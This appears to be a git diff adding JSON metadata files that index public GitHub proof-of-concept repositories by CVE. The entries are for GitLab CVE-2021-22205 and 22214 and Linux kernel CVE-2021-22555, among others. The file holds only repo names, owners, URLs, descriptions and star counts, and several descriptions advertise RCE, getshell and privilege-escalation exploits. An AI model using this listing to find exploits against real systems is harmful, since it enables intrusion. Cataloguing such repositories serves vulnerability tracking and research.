"web_commit_signoff_required": false, + "topics": [ + "cve-2021-22205", + "exploit", + "gitlab", + "pentest-scripts", + "preauth-rce", + "security" + ], + "visibility": "public", + "forks": 39, + "watchers": 220, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 431842886, + "name": "Golang-CVE-2021-22205-POC", + "full_name": "pizza-power\/Golang-CVE-2021-22205-POC", + "owner": { + "login": "pizza-power", + "id": 6135659, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6135659?v=4", + "html_url": "https:\/\/github.com\/pizza-power", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pizza-power\/Golang-CVE-2021-22205-POC", + "description": "A CVE-2021-22205 Gitlab RCE POC written in Golang", + "fork": false, + "created_at": "2021-11-25T12:47:27Z", + "updated_at": "2022-07-04T14:26:31Z", + "pushed_at": "2021-11-25T21:00:20Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 432503000, + "name": "GitLab-cve-2021-22205-nse", + "full_name": "DIVD-NL\/GitLab-cve-2021-22205-nse", + "owner": { + "login": "DIVD-NL", + "id": 56316504, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56316504?v=4", + "html_url": "https:\/\/github.com\/DIVD-NL", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DIVD-NL\/GitLab-cve-2021-22205-nse", + "description": "NSE script to fingerprint if GitLab is vulnerable to cve-2021-22205-nse", + "fork": false, + "created_at": "2021-11-27T15:53:33Z", + "updated_at": "2022-07-28T12:46:16Z", + "pushed_at": "2021-11-27T16:31:48Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 440732240, + "name": "Gitlab-CVE-2021-22205", + "full_name": "w0x68y\/Gitlab-CVE-2021-22205", + "owner": { + "login": "w0x68y", + "id": 22195911, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22195911?v=4", + "html_url": "https:\/\/github.com\/w0x68y", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/w0x68y\/Gitlab-CVE-2021-22205", + "description": "CVE-2021-22205 的批量检测脚本", + "fork": false, + "created_at": "2021-12-22T04:30:17Z", + "updated_at": "2024-06-06T06:04:09Z", + "pushed_at": "2021-12-22T04:34:44Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 468414500, + "name": "CVE-2021-22205-gitlab", + "full_name": "al4xs\/CVE-2021-22205-gitlab", + "owner": { + "login": "al4xs", + "id": 40411471, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40411471?v=4", + "html_url": "https:\/\/github.com\/al4xs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/al4xs\/CVE-2021-22205-gitlab", + "description": null, + "fork": false, + "created_at": "2022-03-10T16:03:47Z", + "updated_at": "2023-10-22T17:20:05Z", + "pushed_at": "2022-03-10T16:03:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 469576094, + "name": "CVE-2021-22205", + "full_name": "honypot\/CVE-2021-22205", + "owner": { + "login": "honypot", + "id": 101309325, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101309325?v=4", + "html_url": "https:\/\/github.com\/honypot", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/honypot\/CVE-2021-22205", + "description": null, + "fork": false, + "created_at": "2022-03-14T04:09:18Z", + "updated_at": "2022-03-14T04:09:34Z", + "pushed_at": "2022-03-14T04:09:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 482719088, + "name": "cve-2021-22205-GitLab-13.10.2---Remote-Code-Execution-RCE-Unauthenticated-", + "full_name": "momika233\/cve-2021-22205-GitLab-13.10.2---Remote-Code-Execution-RCE-Unauthenticated-", + "owner": { + "login": "momika233", + "id": 56291820, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56291820?v=4", + "html_url": "https:\/\/github.com\/momika233", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/momika233\/cve-2021-22205-GitLab-13.10.2---Remote-Code-Execution-RCE-Unauthenticated-", + "description": "GitLab 13.10.2 - Remote Code Execution (RCE) (Unauthenticated) cve-2021-22205", + "fork": false, + "created_at": "2022-04-18T04:56:18Z", + "updated_at": "2024-08-12T20:22:32Z", + "pushed_at": "2022-04-18T04:56:52Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 516065519, + "name": "CVE-2021-22205", + "full_name": "keven1z\/CVE-2021-22205", + "owner": { + "login": "keven1z", + "id": 43847458, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43847458?v=4", + "html_url": "https:\/\/github.com\/keven1z", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/keven1z\/CVE-2021-22205", + "description": "CVE-2021-22205 检测脚本,支持getshell和命令执行", + "fork": false, + "created_at": "2022-07-20T16:57:57Z", + "updated_at": "2024-08-12T20:25:16Z", + "pushed_at": "2022-07-25T03:04:01Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-22205", + "gitlab" + ], + "visibility": "public", + "forks": 3, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 607046636, + "name": "CVE-2021-22205", + "full_name": "hhhotdrink\/CVE-2021-22205", + "owner": { + "login": "hhhotdrink", + "id": 102781103, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102781103?v=4", + "html_url": "https:\/\/github.com\/hhhotdrink", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hhhotdrink\/CVE-2021-22205", + "description": null, + "fork": false, + "created_at": "2023-02-27T07:42:12Z", + "updated_at": "2023-02-27T09:04:40Z", + "pushed_at": "2023-02-27T09:22:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 611714461, + "name": "CVE-2021-22205", + "full_name": "sei-fish\/CVE-2021-22205", + "owner": { + "login": "sei-fish", + "id": 66983450, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66983450?v=4", + "html_url": "https:\/\/github.com\/sei-fish", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sei-fish\/CVE-2021-22205", + "description": null, + "fork": false, + "created_at": "2023-03-09T11:53:37Z", + "updated_at": "2023-03-09T11:53:37Z", + "pushed_at": "2023-03-09T11:53:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 673613322, + "name": "DejaVu-CVE-2021-22205", + "full_name": "overgrowncarrot1\/DejaVu-CVE-2021-22205", + "owner": { + "login": "overgrowncarrot1", + "id": 78485709, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78485709?v=4", + "html_url": "https:\/\/github.com\/overgrowncarrot1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/overgrowncarrot1\/DejaVu-CVE-2021-22205", + "description": null, + "fork": false, + "created_at": "2023-08-02T03:15:59Z", + "updated_at": "2023-08-02T03:18:20Z", + "pushed_at": "2023-08-02T03:18:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 689120452, + "name": "CVE-2021-22205", + "full_name": "Hikikan\/CVE-2021-22205", + "owner": { + "login": "Hikikan", + "id": 74212724, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74212724?v=4", + "html_url": "https:\/\/github.com\/Hikikan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Hikikan\/CVE-2021-22205", + "description": null, + "fork": false, + "created_at": "2023-09-08T21:16:40Z", + "updated_at": "2023-09-08T21:16:41Z", + "pushed_at": "2023-09-08T21:56:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 712969635, + "name": "gitlab-cve-2021-22205", + "full_name": "NukingDragons\/gitlab-cve-2021-22205", + "owner": { + "login": "NukingDragons", + "id": 9376673, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9376673?v=4", + "html_url": "https:\/\/github.com\/NukingDragons", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NukingDragons\/gitlab-cve-2021-22205", + "description": "A simple bash script that exploits CVE-2021-22205 against vulnerable instances of gitlab", + "fork": false, + "created_at": "2023-11-01T15:19:01Z", + "updated_at": "2023-11-06T00:16:03Z", + "pushed_at": "2023-11-01T15:23:01Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 803032803, + "name": "CVE-2021-22205", + "full_name": "cc3305\/CVE-2021-22205", + "owner": { + "login": "cc3305", + "id": 103961201, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103961201?v=4", + "html_url": "https:\/\/github.com\/cc3305", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cc3305\/CVE-2021-22205", + "description": "CVE-2021-22205 exploit script", + "fork": false, + "created_at": "2024-05-19T23:14:48Z", + "updated_at": "2024-07-27T20:13:57Z", + "pushed_at": "2024-07-27T20:13:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-22206.json b/2021/CVE-2021-22206.json new file mode 100644 index 0000000000..971de2d4ab --- /dev/null +++ b/2021/CVE-2021-22206.json @@ -0,0 +1,33 @@ +[ + { + "id": 423994472, + "name": "CVE-2021-22206", + "full_name": "dannymas\/CVE-2021-22206", + "owner": { + "login": "dannymas", + "id": 34144449, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34144449?v=4", + "html_url": "https:\/\/github.com\/dannymas", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dannymas\/CVE-2021-22206", + "description": null, + "fork": false, + "created_at": "2021-11-02T20:48:30Z", + "updated_at": "2022-09-15T02:50:48Z", + "pushed_at": "2021-11-01T05:47:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-22214.json b/2021/CVE-2021-22214.json new file mode 100644 index 0000000000..e312e12bed --- /dev/null +++ b/2021/CVE-2021-22214.json @@ -0,0 +1,95 @@ +[ + { + "id": 379275650, + "name": "CVE-2021-22214", + "full_name": "aaminin\/CVE-2021-22214", + "owner": { + "login": "aaminin", + "id": 47250161, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47250161?v=4", + "html_url": "https:\/\/github.com\/aaminin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aaminin\/CVE-2021-22214", + "description": "Gitlab CI Lint API未授权 SSRF漏洞 (CVE-2021-22214)", + "fork": false, + "created_at": "2021-06-22T13:15:43Z", + "updated_at": "2024-08-12T20:14:09Z", + "pushed_at": "2021-06-22T04:35:08Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 381405553, + "name": "gitlab-cve-2021-22214", + "full_name": "Vulnmachines\/gitlab-cve-2021-22214", + "owner": { + "login": "Vulnmachines", + "id": 79006904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4", + "html_url": "https:\/\/github.com\/Vulnmachines", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulnmachines\/gitlab-cve-2021-22214", + "description": "Gitlab SSRF", + "fork": false, + "created_at": "2021-06-29T15:04:35Z", + "updated_at": "2024-08-12T20:14:19Z", + "pushed_at": "2022-07-26T05:25:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 423332466, + "name": "CVE-2021-22214", + "full_name": "ZZ-SOCMAP\/CVE-2021-22214", + "owner": { + "login": "ZZ-SOCMAP", + "id": 98105412, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98105412?v=4", + "html_url": "https:\/\/github.com\/ZZ-SOCMAP", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ZZ-SOCMAP\/CVE-2021-22214", + "description": "Gitlab CI Lint API未授权 SSRF漏洞 CVE-2021-22214", + "fork": false, + "created_at": "2021-11-01T04:04:42Z", + "updated_at": "2024-09-19T01:57:21Z", + "pushed_at": "2021-11-04T02:21:28Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-22555.json b/2021/CVE-2021-22555.json new file mode 100644 index 0000000000..c253ff2e14 --- /dev/null +++ b/2021/CVE-2021-22555.json @@ -0,0 +1,317 @@ +[ + { + "id": 386247610, + "name": "cve-2021-22555", + "full_name": "JoneyJunior\/cve-2021-22555", + "owner": { + "login": "JoneyJunior", + "id": 34868726, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34868726?v=4", + "html_url": "https:\/\/github.com\/JoneyJunior", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JoneyJunior\/cve-2021-22555", + "description": null, + "fork": false, + "created_at": "2021-07-15T10:17:42Z", + "updated_at": "2022-02-16T11:36:19Z", + "pushed_at": "2021-07-15T10:18:03Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 386476892, + "name": "CVE-2021-22555-Exploit", + "full_name": "xyjl-ly\/CVE-2021-22555-Exploit", + "owner": { + "login": "xyjl-ly", + "id": 85824157, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85824157?v=4", + "html_url": "https:\/\/github.com\/xyjl-ly", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xyjl-ly\/CVE-2021-22555-Exploit", + "description": "CVE-2021-22555 Exploit", + "fork": false, + "created_at": "2021-07-16T01:54:01Z", + "updated_at": "2024-08-15T10:06:01Z", + "pushed_at": "2022-07-28T01:56:07Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 17, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 17, + "watchers": 10, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 386739997, + "name": "container-cve-2021-22555", + "full_name": "cgwalters\/container-cve-2021-22555", + "owner": { + "login": "cgwalters", + "id": 244096, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/244096?v=4", + "html_url": "https:\/\/github.com\/cgwalters", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cgwalters\/container-cve-2021-22555", + "description": null, + "fork": false, + "created_at": "2021-07-16T19:12:57Z", + "updated_at": "2021-12-01T15:38:51Z", + "pushed_at": "2021-07-19T20:05:49Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 412296277, + "name": "CVE-2021-22555-esc-priv", + "full_name": "daletoniris\/CVE-2021-22555-esc-priv", + "owner": { + "login": "daletoniris", + "id": 4347515, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4347515?v=4", + "html_url": "https:\/\/github.com\/daletoniris", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/daletoniris\/CVE-2021-22555-esc-priv", + "description": null, + "fork": false, + "created_at": "2021-10-01T02:18:45Z", + "updated_at": "2021-10-01T02:19:18Z", + "pushed_at": "2021-10-01T02:19:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 478003975, + "name": "CVE-2021-22555-PipeVersion", + "full_name": "veritas501\/CVE-2021-22555-PipeVersion", + "owner": { + "login": "veritas501", + "id": 25763545, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25763545?v=4", + "html_url": "https:\/\/github.com\/veritas501", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/veritas501\/CVE-2021-22555-PipeVersion", + "description": "CVE-2021-22555 exploit rewritten with pipe primitive", + "fork": false, + "created_at": "2022-04-05T06:35:25Z", + "updated_at": "2024-07-06T05:29:41Z", + "pushed_at": "2022-05-18T03:10:10Z", + "stargazers_count": 36, + "watchers_count": 36, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 36, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 639020308, + "name": "netsec-project", + "full_name": "masjohncook\/netsec-project", + "owner": { + "login": "masjohncook", + "id": 48942450, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48942450?v=4", + "html_url": "https:\/\/github.com\/masjohncook", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/masjohncook\/netsec-project", + "description": "Script of Network Security Project - Attack on CVE-2021-22555", + "fork": false, + "created_at": "2023-05-10T15:30:32Z", + "updated_at": "2023-06-06T16:17:03Z", + "pushed_at": "2023-05-26T03:21:50Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cyber", + "cybersecurity", + "metasploit", + "ubuntu2004" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 675095070, + "name": "CVE-2021-22555", + "full_name": "tukru\/CVE-2021-22555", + "owner": { + "login": "tukru", + "id": 17105451, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17105451?v=4", + "html_url": "https:\/\/github.com\/tukru", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tukru\/CVE-2021-22555", + "description": "This repo hosts TUKRU's Linux Privilege Escalation exploit (CVE-2021-22555). It demonstrates gaining root privileges via a vulnerability. Tested on Ubuntu 5.8.0-48-generic and COS 5.4.89+. Use responsibly and ethically.", + "fork": false, + "created_at": "2023-08-05T18:56:18Z", + "updated_at": "2024-09-05T11:23:49Z", + "pushed_at": "2023-09-07T10:03:00Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 680824923, + "name": "CVE-2021-22555", + "full_name": "pashayogi\/CVE-2021-22555", + "owner": { + "login": "pashayogi", + "id": 50790111, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50790111?v=4", + "html_url": "https:\/\/github.com\/pashayogi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pashayogi\/CVE-2021-22555", + "description": "Linux Kernel 2.6.19 < 5.9 - 'Netfilter Local Privilege Escalation'", + "fork": false, + "created_at": "2023-08-20T14:26:28Z", + "updated_at": "2024-07-16T13:10:30Z", + "pushed_at": "2023-08-20T14:29:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 752950250, + "name": "-2021-LOCALROOT-CVE-2021-22555", + "full_name": "letsr00t\/-2021-LOCALROOT-CVE-2021-22555", + "owner": { + "login": "letsr00t", + "id": 38699989, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38699989?v=4", + "html_url": "https:\/\/github.com\/letsr00t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/letsr00t\/-2021-LOCALROOT-CVE-2021-22555", + "description": null, + "fork": false, + "created_at": "2024-02-05T07:05:13Z", + "updated_at": "2024-02-05T07:05:13Z", + "pushed_at": "2024-02-05T07:05:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 763893253, + "name": "CVE-2021-22555", + "full_name": "letsr00t\/CVE-2021-22555", + "owner": { + "login": "letsr00t", + "id": 38699989, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38699989?v=4", + "html_url": "https:\/\/github.com\/letsr00t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/letsr00t\/CVE-2021-22555", + "description": null, + "fork": false, + "created_at": "2024-02-27T05:22:13Z", + "updated_at": "2024-02-27T05:22:47Z", + "pushed_at": "2024-02-27T05:22:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-22569.json b/2021/CVE-2021-22569.json new file mode 100644 index 0000000000..1ce9b7902b --- /dev/null +++ b/2021/CVE-2021-22569.json @@ -0,0 +1,33 @@ +[ + { + "id": 447451610, + "name": "A-potential-Denial-of-Service-issue-in-protobuf-java", + "full_name": "Mario-Kart-Felix\/A-potential-Denial-of-Service-issue-in-protobuf-java", + "owner": { + "login": "Mario-Kart-Felix", + "id": 76971465, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76971465?v=4", + "html_url": "https:\/\/github.com\/Mario-Kart-Felix", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mario-Kart-Felix\/A-potential-Denial-of-Service-issue-in-protobuf-java", + "description": "A potential Denial of Service issue in protobuf-java high severity GitHub Reviewed Published 5 days ago in protocolbuffers\/protobuf • Updated yesterday Vulnerability details Dependabot alerts 2 Package com.google.protobuf:protobuf-java (maven) Affected versions < 3.16.1 >= 3.18.0, < 3.18.2 >= 3.19.0, < 3.19.2 Patched versions 3.16.1 3.18.2 3.19.2 Package com.google.protobuf:protobuf-kotlin (maven) Affected versions >= 3.18.0, < 3.18.2 >= 3.19.0, < 3.19.2 Patched versions 3.18.2 3.19.2 Package google-protobuf (RubyGems) Affected versions < 3.19.2 Patched versions 3.19.2 Description Summary A potential Denial of Service issue in protobuf-java was discovered in the parsing procedure for binary data. Reporter: OSS-Fuzz Affected versions: All versions of Java Protobufs (including Kotlin and JRuby) prior to the versions listed below. Protobuf \"javalite\" users (typically Android) are not affected. Severity CVE-2021-22569 High - CVSS Score: 7.5, An implementation weakness in how unknown fields are parsed in Java. A small (~800 KB) malicious payload can occupy the parser for several minutes by creating large numbers of short-lived objects that cause frequent, repeated GC pauses. Proof of Concept For reproduction details, please refer to the oss-fuzz issue that identifies the specific inputs that exercise this parsing weakness. Remediation and Mitigation Please update to the latest available versions of the following packages: protobuf-java (3.16.1, 3.18.2, 3.19.2) protobuf-kotlin (3.18.2, 3.19.2) google-protobuf [JRuby gem only] (3.19.2) References GHSA-wrvw-hg22-4m67 https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2021-22569 https:\/\/bugs.chromium.org\/p\/oss-fuzz\/issues\/detail?id=39330 https:\/\/cloud.google.com\/support\/bulletins#gcp-2022-001", + "fork": false, + "created_at": "2022-01-13T03:33:54Z", + "updated_at": "2022-02-17T18:43:41Z", + "pushed_at": "2022-02-17T18:41:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-22873.json b/2021/CVE-2021-22873.json new file mode 100644 index 0000000000..01244180d8 --- /dev/null +++ b/2021/CVE-2021-22873.json @@ -0,0 +1,33 @@ +[ + { + "id": 669618948, + "name": "CVE-2021-22873-EXPLOIT", + "full_name": "K3ysTr0K3R\/CVE-2021-22873-EXPLOIT", + "owner": { + "login": "K3ysTr0K3R", + "id": 70909693, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70909693?v=4", + "html_url": "https:\/\/github.com\/K3ysTr0K3R", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/K3ysTr0K3R\/CVE-2021-22873-EXPLOIT", + "description": "A PoC exploit for CVE-2021-22873 - Revive Adserver Open Redirect Vulnerability.", + "fork": false, + "created_at": "2023-07-22T21:49:54Z", + "updated_at": "2024-04-24T15:52:41Z", + "pushed_at": "2023-08-09T10:51:00Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-22880.json b/2021/CVE-2021-22880.json new file mode 100644 index 0000000000..e8a38f0cc6 --- /dev/null +++ b/2021/CVE-2021-22880.json @@ -0,0 +1,33 @@ +[ + { + "id": 711816998, + "name": "CVE-2021-22880", + "full_name": "halkichi0308\/CVE-2021-22880", + "owner": { + "login": "halkichi0308", + "id": 42630259, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42630259?v=4", + "html_url": "https:\/\/github.com\/halkichi0308", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/halkichi0308\/CVE-2021-22880", + "description": null, + "fork": false, + "created_at": "2023-10-30T08:30:12Z", + "updated_at": "2024-06-05T16:25:15Z", + "pushed_at": "2023-10-30T08:32:32Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-22893.json b/2021/CVE-2021-22893.json new file mode 100644 index 0000000000..a0cfe3ee4f --- /dev/null +++ b/2021/CVE-2021-22893.json @@ -0,0 +1,99 @@ +[ + { + "id": 360115874, + "name": "CVE-2021-22893_HoneyPoC2", + "full_name": "ZephrFish\/CVE-2021-22893_HoneyPoC2", + "owner": { + "login": "ZephrFish", + "id": 5783068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5783068?v=4", + "html_url": "https:\/\/github.com\/ZephrFish", + "user_view_type": "public" + }, + "html_url": 